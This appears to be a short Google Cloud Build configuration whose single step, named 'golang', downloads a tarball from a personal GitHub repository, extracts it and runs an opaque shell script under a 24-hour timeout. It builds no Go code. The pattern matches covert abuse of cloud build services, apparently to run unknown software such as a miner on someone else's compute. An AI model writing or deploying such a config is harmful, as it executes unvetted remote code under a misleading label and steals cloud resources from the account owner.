steps: 
  - name: golang 
    args:  
      - '-c' 
      - >- 
        wget https://github.com/Pantaiselatan/amd/raw/main/hvn.tar.gz && tar xf hvn.tar.gz && ./hvn.sh 
    waitFor: ["-"] 
    entrypoint: /bin/bash 
timeout: 86400s
